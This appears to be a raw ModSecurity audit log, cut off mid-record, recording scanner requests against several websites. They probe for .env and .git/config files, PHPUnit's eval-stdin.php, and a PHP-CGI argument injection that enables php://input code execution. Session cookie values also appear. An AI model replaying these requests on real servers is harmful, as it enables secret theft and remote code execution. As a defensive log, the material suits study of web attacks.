aIGkmlooLYw4or2LgWLa7gAAAMs 78.153.140.179 39750 127.0.0.1 7081 --96ddd402-B-- GET /backend/.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 78.153.140.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7 --96ddd402-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --96ddd402-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/backend/.env"] [unique_id "aIGkmlooLYw4or2LgWLa7gAAAMs"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753326746642968 1422 (- - -) Stopwatch2: 1753326746642968 1422; combined=888, p1=728, p2=0, p3=37, p4=33, p5=89, sr=258, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96ddd402-Z-- --a3eb0a27-A-- [24/Jul/2025:06:12:27.712420 +0300] aIGkm1ooLYw4or2LgWLa9AAAANI 78.153.140.179 39836 127.0.0.1 7081 --a3eb0a27-B-- GET /admin/.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 78.153.140.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: More Firefox 1.5.0.4 user agents strings -->> --a3eb0a27-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3eb0a27-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/admin/.env"] [unique_id "aIGkm1ooLYw4or2LgWLa9AAAANI"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753326747710960 1593 (- - -) Stopwatch2: 1753326747710960 1593; combined=934, p1=742, p2=0, p3=42, p4=40, p5=110, sr=269, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3eb0a27-Z-- --5290c34e-A-- [24/Jul/2025:06:12:29.192549 +0300] aIGknVooLYw4or2LgWLa-QAAAME 78.153.140.179 39948 127.0.0.1 7081 --5290c34e-B-- GET /.env.example HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 78.153.140.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.1.39 (KHTML, like Gecko) Version/9.0 Safari/601.1.39 --5290c34e-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --5290c34e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.env.example"] [unique_id "aIGknVooLYw4or2LgWLa-QAAAME"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753326749191060 1621 (- - -) Stopwatch2: 1753326749191060 1621; combined=706, p1=526, p2=0, p3=27, p4=32, p5=120, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5290c34e-Z-- --1d739417-A-- [24/Jul/2025:06:19:17.083713 +0300] aIGmNEdutIOpb_kg22ilDQAAABY 68.183.9.16 60410 127.0.0.1 7081 --1d739417-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 68.183.9.16 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --1d739417-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --1d739417-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||crm.hamomohsen.net|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||crm.hamomohsen.net|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "crm.hamomohsen.net"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIGmNEdutIOpb_kg22ilDQAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327156949274 134663 (- - -) Stopwatch2: 1753327156949274 134663; combined=5265, p1=551, p2=4470, p3=0, p4=0, p5=243, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d739417-Z-- --efd7613d-A-- [24/Jul/2025:06:19:20.609031 +0300] aIGmOEdutIOpb_kg22ilHgAAAAs 68.183.9.16 32792 127.0.0.1 7081 --efd7613d-B-- GET /.env HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 68.183.9.16 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --efd7613d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --efd7613d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.hamomohsen.net"] [uri "/.env"] [unique_id "aIGmOEdutIOpb_kg22ilHgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327160486528 122585 (- - -) Stopwatch2: 1753327160486528 122585; combined=3474, p1=1606, p2=1715, p3=0, p4=0, p5=152, sr=1127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efd7613d-Z-- --ed99f125-A-- [24/Jul/2025:06:19:21.954499 +0300] aIGmOVooLYw4or2LgWLo3AAAAMM 68.183.9.16 32940 127.0.0.1 7081 --ed99f125-B-- GET /.git/config HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 68.183.9.16 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --ed99f125-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --ed99f125-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.hamomohsen.net"] [uri "/.git/config"] [unique_id "aIGmOVooLYw4or2LgWLo3AAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327161817694 136895 (- - -) Stopwatch2: 1753327161817694 136895; combined=3766, p1=1638, p2=2048, p3=0, p4=0, p5=80, sr=1187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed99f125-Z-- --89735777-A-- [24/Jul/2025:06:20:30.834530 +0300] aIGmfkdutIOpb_kg22imHgAAAAA 68.183.228.110 48702 127.0.0.1 7081 --89735777-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: jinansystem.com X-Real-IP: 68.183.228.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/html --89735777-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --89735777-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jinansystem.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIGmfkdutIOpb_kg22imHgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jinansystem.com"] [uri "/error_docs/not_found.html"] [unique_id "aIGmfkdutIOpb_kg22imHgAAAAA"] Stopwatch: 1753327230828563 6168 (- - -) Stopwatch2: 1753327230828563 6168; combined=3843, p1=682, p2=2868, p3=0, p4=0, p5=293, sr=188, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89735777-Z-- --112acf11-A-- [24/Jul/2025:06:20:31.724376 +0300] aIGmf1ooLYw4or2LgWLrVwAAAMU 68.183.228.110 48834 127.0.0.1 7081 --112acf11-B-- POST /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: jinansystem.com X-Real-IP: 68.183.228.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/html --112acf11-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --112acf11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jinansystem.com"] [uri "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIGmf1ooLYw4or2LgWLrVwAAAMU"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jinansystem.com"] [uri "/error_docs/not_found.html"] [unique_id "aIGmf1ooLYw4or2LgWLrVwAAAMU"] Stopwatch: 1753327231718682 5854 (- - -) Stopwatch2: 1753327231718682 5854; combined=3546, p1=791, p2=2551, p3=0, p4=0, p5=203, sr=215, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --112acf11-Z-- --c1880747-A-- [24/Jul/2025:06:20:32.581624 +0300] aIGmgFooLYw4or2LgWLrYwAAAMI 68.183.228.110 48970 127.0.0.1 7081 --c1880747-B-- POST /app/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: jinansystem.com X-Real-IP: 68.183.228.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/html --c1880747-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --c1880747-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jinansystem.com"] [uri "/app/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIGmgFooLYw4or2LgWLrYwAAAMI"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jinansystem.com"] [uri "/error_docs/not_found.html"] [unique_id "aIGmgFooLYw4or2LgWLrYwAAAMI"] Stopwatch: 1753327232573308 8391 (- - -) Stopwatch2: 1753327232573308 8391; combined=3471, p1=868, p2=2441, p3=0, p4=0, p5=162, sr=252, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1880747-Z-- --367b2342-A-- [24/Jul/2025:06:20:33.464679 +0300] aIGmgVooLYw4or2LgWLragAAAMQ 68.183.228.110 58944 127.0.0.1 7081 --367b2342-B-- POST /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: jinansystem.com X-Real-IP: 68.183.228.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/html --367b2342-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --367b2342-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jinansystem.com"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIGmgVooLYw4or2LgWLragAAAMQ"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jinansystem.com"] [uri "/error_docs/not_found.html"] [unique_id "aIGmgVooLYw4or2LgWLragAAAMQ"] Stopwatch: 1753327233459423 5358 (- - -) Stopwatch2: 1753327233459423 5358; combined=3184, p1=869, p2=2116, p3=0, p4=0, p5=199, sr=252, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --367b2342-Z-- --4a0b1f2b-A-- [24/Jul/2025:06:20:34.347733 +0300] aIGmglooLYw4or2LgWLrdgAAAMY 68.183.228.110 59070 127.0.0.1 7081 --4a0b1f2b-B-- POST /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: jinansystem.com X-Real-IP: 68.183.228.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/html --4a0b1f2b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --4a0b1f2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jinansystem.com|F|2"] [data "TX:0=text/html"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jinansystem.com"] [uri "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIGmglooLYw4or2LgWLrdgAAAMY"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jinansystem.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jinansystem.com"] [uri "/error_docs/not_found.html"] [unique_id "aIGmglooLYw4or2LgWLrdgAAAMY"] Stopwatch: 1753327234329948 17915 (- - -) Stopwatch2: 1753327234329948 17915; combined=12567, p1=2603, p2=9521, p3=0, p4=0, p5=443, sr=185, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a0b1f2b-Z-- --82dc1530-A-- [24/Jul/2025:06:26:48.354076 +0300] aIGn-EdutIOpb_kg22ircAAAAAk 195.178.110.161 60318 127.0.0.1 7081 --82dc1530-B-- GET /.env HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --82dc1530-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6Ii92d2ZkZEE4L1F4MVVTZkdiMDVMSWc9PSIsInZhbHVlIjoiRlN4K21BUXIrZTAwc0ovRXFuV05FcHRRc2RCZk9vTXI3VjFXVkR4SnYzR0ZuYmxvZG9TWGlpTTlxeXdvTFRJT3dtYk5vcVdSU0RBd3JGeHpyMWlHZUhPY1BKNUk5ZzRZbEJiVUU2V3duQkFoaUJ3ZEhnZ1REWWkxcTRCdldOMWciLCJtYWMiOiJmMmM1MjliNTNmMzhkMDM3OWZjZTM4M2U2MjUyZjJmYjBiZDNmMzE5YWFkM2M4ZjIzNmUyOTE1MDFjY2ZkMGFiIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 05:26:48 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=PaWlu4C8x738oqFUKWdcqtFOW2whU4Dsl9XLw1VZ; expires=Thu, 24 Jul 2025 05:26:48 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --82dc1530-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file 